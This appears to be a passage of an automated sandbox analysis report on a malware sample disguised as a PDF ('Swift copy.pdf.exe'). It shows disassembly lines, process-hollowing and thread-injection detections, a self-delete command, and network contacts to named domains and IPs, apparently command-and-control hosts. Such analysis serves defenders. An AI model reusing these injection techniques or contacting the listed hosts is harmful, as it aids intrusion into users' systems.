          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049661A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049661A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049635A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049E8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0493B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0493B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0493B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049C41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0494D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0494D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04939100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04939100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04939100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04A08D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04943D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04943D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04943D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04943D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04943D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04943D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04943D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04943D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04943D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04943D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04943D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04943D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04943D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0493AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0496513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0496513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049BA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04964D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04964D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04964D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04954120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04954120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04954120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04954120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04954120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04957D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0495B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0495B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04973D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0493B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0493B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0495C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0495C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0493C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0496D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0496D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04A00EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04A00EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04A00EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049CFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0494AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0494AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0496FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04978EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049636CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04962ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049EFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04962AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049616E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04A08ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049476E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04935210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04935210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04935210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04935210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0493AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0493AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04953A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0496A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0496A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0493C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0493C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0493C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04968E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049F1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04948A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049EFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0493E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04974A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04974A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04A08A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049C4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04939240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04939240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04939240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04939240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04947E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04947E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04947E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04947E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04947E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04947E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0495AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0495AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0495AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0495AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0495AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0497927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0494766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049EB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049EB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04948794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04962397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04A05BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0496B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049F138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04941B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04941B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049ED380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04964BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04964BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04964BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049737F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0495DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0495F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049F131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049CFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049CFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0496A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0496A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0496E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04A0070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04A0070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04934F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04934F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04A08F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0493F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0493DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0494EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04963B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04963B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0493DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0494FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04A08B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\cscript.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.agenciaorange.net
          Source: C:\Windows\explorer.exeDomain query: www.lehoachi.com
          Source: C:\Windows\explorer.exeNetwork Connect: 204.11.56.48 80
          Source: C:\Windows\explorer.exeNetwork Connect: 74.208.236.87 80
          Source: C:\Windows\explorer.exeDomain query: www.technomark.xyz
          Source: C:\Windows\explorer.exeDomain query: www.wapgoals.com
          Source: C:\Windows\explorer.exeNetwork Connect: 174.136.25.55 80
          Source: C:\Windows\explorer.exeNetwork Connect: 45.33.51.100 80
          Source: C:\Windows\explorer.exeDomain query: www.rileysboutique.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 51.222.80.112 80
          Source: C:\Windows\explorer.exeDomain query: www.stepmed.life
          Source: C:\Windows\explorer.exeDomain query: www.indiafoodtraveling.com
          Source: C:\Windows\explorer.exeNetwork Connect: 5.101.123.53 80
          Source: C:\Windows\explorer.exeDomain query: www.criticalredux.com
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeMemory written: C:\Users\user\Desktop\Swift copy.pdf.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeThread register set: target process: 3440
          Source: C:\Windows\SysWOW64\cscript.exeThread register set: target process: 3440
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeSection unmapped: C:\Windows\SysWOW64\cscript.exe base address: 30000
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess created: C:\Users\user\Desktop\Swift copy.pdf.exe C:\Users\user\Desktop\Swift copy.pdf.exe
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess created: C:\Users\user\Desktop\Swift copy.pdf.exe C:\Users\user\Desktop\Swift copy.pdf.exe
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Swift copy.pdf.exe'
          Source: explorer.exe, 00000007.00000002.592968697.0000000000EE0000.00000002.00000001.sdmp, cscript.exe, 0000000A.00000002.593147820.0000000003500000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000007.00000002.592968697.0000000000EE0000.00000002.00000001.sdmp, cscript.exe, 0000000A.00000002.593147820.0000000003500000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000007.00000002.592968697.0000000000EE0000.00000002.00000001.sdmp, cscript.exe, 0000000A.00000002.593147820.0000000003500000.00000002.00000001.sdmpBinary or memory string: &Program Manager
          Source: explorer.exe, 00000007.00000002.592968697.0000000000EE0000.00000002.00000001.sdmp, cscript.exe, 0000000A.00000002.593147820.0000000003500000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Users\user\Desktop\Swift copy.pdf.exe VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
